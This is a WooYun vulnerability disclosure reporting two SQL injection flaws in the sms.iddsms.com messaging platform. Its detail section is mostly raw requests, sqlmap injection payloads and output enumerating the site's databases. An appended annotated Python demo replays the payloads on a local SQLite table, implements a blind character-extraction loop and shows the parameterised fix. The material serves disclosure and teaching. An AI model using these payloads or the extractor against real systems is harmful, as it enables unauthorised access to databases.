
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0126717

Title: SQL injection vulnerability in a 多打电话 system

Vendor: iddsms.com

Author: 路人甲

Submitted: 2015-07-14 16:09

Fix time: 2015-07-19 16:10

Published: 2015-07-19 16:10

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-07-14: details sent to the vendor, awaiting vendor response
2015-07-19: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

As the title says.

Detailed description:

First injection point:

GET /user_findloginuser.jsp?loginuser=admin HTTP/1.1
Host: sms.iddsms.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.1.2238.18 Safari/537.36
Accept: */*
Referer: http://sms.iddsms.com/fgpaswd.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=EB7432D3B39E5A8AADFF7DE31F54460A


[Screenshot: 0.png]


GET parameter 'loginuser' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 93 HTTP(s) requests:
---
Parameter: loginuser (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: loginuser=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))RKKk) AND 'qxiH'='qxiH
---
[14:49:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[14:49:52] [INFO] fetching database names
[14:49:52] [INFO] fetching number of databases
[14:49:52] [INFO] retrieved:
[14:49:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
2
[14:50:09] [INFO] retrieved:
[14:50:14] [INFO] adjusting time delay to 4 seconds due to good response times
[14:50:34] [ERROR] invalid character detected. retrying..
[14:50:34] [WARNING] increasing time delay to 5 seconds
[14:50:55] [ERROR] invalid character detected. retrying..
[14:50:55] [WARNING] increasing time delay to 6 seconds
information_schema
[14:59:32] [INFO] retrieved: w
[15:00:31] [ERROR] invalid character detected. retrying..
[15:00:31] [WARNING] increasing time delay to 7 seconds
ebsm
[15:03:08] [ERROR] invalid character detected. retrying..
[15:03:08] [WARNING] increasing time delay to 8 seconds
s
[15:04:35] [ERROR] invalid character detected. retrying..
[15:04:35] [WARNING] increasing time delay to 9 seconds
s
available databases [2]:
[*] information_schema
[*] websmss
[15:05:18] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\sms.iddsms.com'


Second injection point:

GET /manager/base/tailmt.jsp?seqid=1262236 HTTP/1.1
Host: sms.iddsms.com
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.1.2238.18 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=EB7432D3B39E5A8AADFF7DE31F54460A


[Screenshot: 1.png]


sqlmap identified the following injection points with a total of 43 HTTP(s) requests:
---
Parameter: seqid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: seqid=1262236' AND 9000=9000 AND 'zfLF'='zfLF
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: seqid=1262236' AND (SELECT 5252 FROM(SELECT COUNT(*),CONCAT(0x7162717871,(SELECT (ELT(5252=5252,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bYNj'='bYNj
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: seqid=1262236' AND (SELECT * FROM (SELECT(SLEEP(5)))WYNu) AND 'uALS'='uALS
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: seqid=-2842' UNION ALL SELECT CONCAT(0x7162717871,0x4362637344627a52594b,0x71627a6271)--
---
[15:00:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[15:00:48] [INFO] fetching database names
[15:00:48] [INFO] the SQL query used returns 2 entries
[15:00:49] [INFO] retrieved: information_schema
[15:00:49] [INFO] retrieved: websmss
available databases [2]:
[*] information_schema
[*] websmss
[15:00:50] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\sms.iddsms.com'
[*] shutting down at 15:00:50


[Screenshot: 3.png]


[Screenshot: 4.png]
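The payload shapes above tell us how the JSP builds its query: every working payload opens with a single quote and closes with a balancing `AND 'x'='x`, so the request parameter is being pasted into a quoted string literal, even for the numeric-looking seqid. The following is an added example, not code from the report or from the iddsms.com application, that reproduces that pattern against a constructed in-memory SQLite table (the real websmss schema is not on the page; the table name mt, its columns and the sample rows are assumptions, and SQLite's `||` stands in for MySQL's CONCAT of hex literals). It runs the report's boolean-based and UNION payloads against the vulnerable concatenation, shows that a parameterised query treats the same payload as an inert string, and implements the true/false character extraction loop that sqlmap used to pull the database names one character at a time:

```python
import sqlite3

# Constructed stand-in for the data behind tailmt.jsp. The real schema is
# not on the page; table "mt", its columns and these rows are assumptions.
SAMPLE_ROWS = [
    (1262236, "13800000000", "demo message one"),
    (1262237, "13900000000", "demo message two"),
]


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mt (seqid INTEGER, mobile TEXT, content TEXT)")
    conn.executemany("INSERT INTO mt VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, seqid):
    """What the sqlmap payloads imply the JSP does: the request parameter is
    pasted into a quoted string literal, so a stray quote rewrites the query."""
    sql = "SELECT content FROM mt WHERE seqid = '" + seqid + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, seqid):
    """Parameterised form: the value travels separately from the SQL text,
    so the same payload is just a string that matches no row."""
    return conn.execute("SELECT content FROM mt WHERE seqid = ?", (seqid,)).fetchall()


def blind_extract(oracle, expr, max_len=64):
    """Recover the text value of SQL expression `expr` through a true/false
    oracle, the way boolean-based blind injection works: first the length,
    then each character by binary search over printable ASCII (32..126)."""
    length = next((n for n in range(max_len + 1)
                   if oracle(f"length(({expr})) = {n}")), None)
    if length is None:
        raise ValueError("value longer than max_len or oracle not working")
    out = ""
    for i in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({expr}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo():
    conn = setup_db()
    normal = "1262236"
    # Boolean-based pair in the shape of the report's payload: the row comes
    # back when the injected condition is true and disappears when it is false.
    true_payload = "1262236' AND 9000=9000 AND 'zfLF'='zfLF"
    false_payload = "1262236' AND 9000=9001 AND 'zfLF'='zfLF"
    # UNION payload in the report's shape; MySQL's CONCAT(0x7162717871,
    # 0x4362637344627a52594b,0x71627a6271) decodes to these three ASCII markers.
    union_payload = "-2842' UNION ALL SELECT 'qbqxq' || 'CbcsDbzRYK' || 'qbzbq'--"

    requests = [0]

    def oracle(cond):
        # One "HTTP request" per question: non-empty result means TRUE.
        requests[0] += 1
        return bool(lookup_vulnerable(conn, f"1262236' AND {cond} AND 'zfLF'='zfLF"))

    # Pull a table name out of the schema through the oracle alone, the
    # SQLite equivalent of sqlmap reading information_schema blind.
    table = blind_extract(oracle, "SELECT name FROM sqlite_master WHERE type='table'")

    return {
        "normal": lookup_vulnerable(conn, normal),
        "true": lookup_vulnerable(conn, true_payload),
        "false": lookup_vulnerable(conn, false_payload),
        "union": lookup_vulnerable(conn, union_payload),
        "safe_normal": lookup_safe(conn, normal),
        "safe_true": lookup_safe(conn, true_payload),
        "table": table,
        "requests": requests[0],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The request counter is the point to compare with the report: extracting a two-character name costs about sixteen true/false questions here, which is why sqlmap needed 93 requests for the time-based case and why that technique degrades as soon as network jitter blurs the SLEEP delay (the "invalid character detected. retrying" lines above). The fix is the `lookup_safe` shape, a PreparedStatement with `?` placeholders in the JSP's case; quoting a numeric parameter, as the application evidently does, is not a substitute.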


Proof of vulnerability:

Remediation:

Copyright notice: when reposting, credit the source as 路人甲@乌云


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored the vulnerability

Ignored at: 2015-07-19 16:10

Vendor reply:

Vulnerability Rank: 4 (WooYun assessment)

Latest status:

None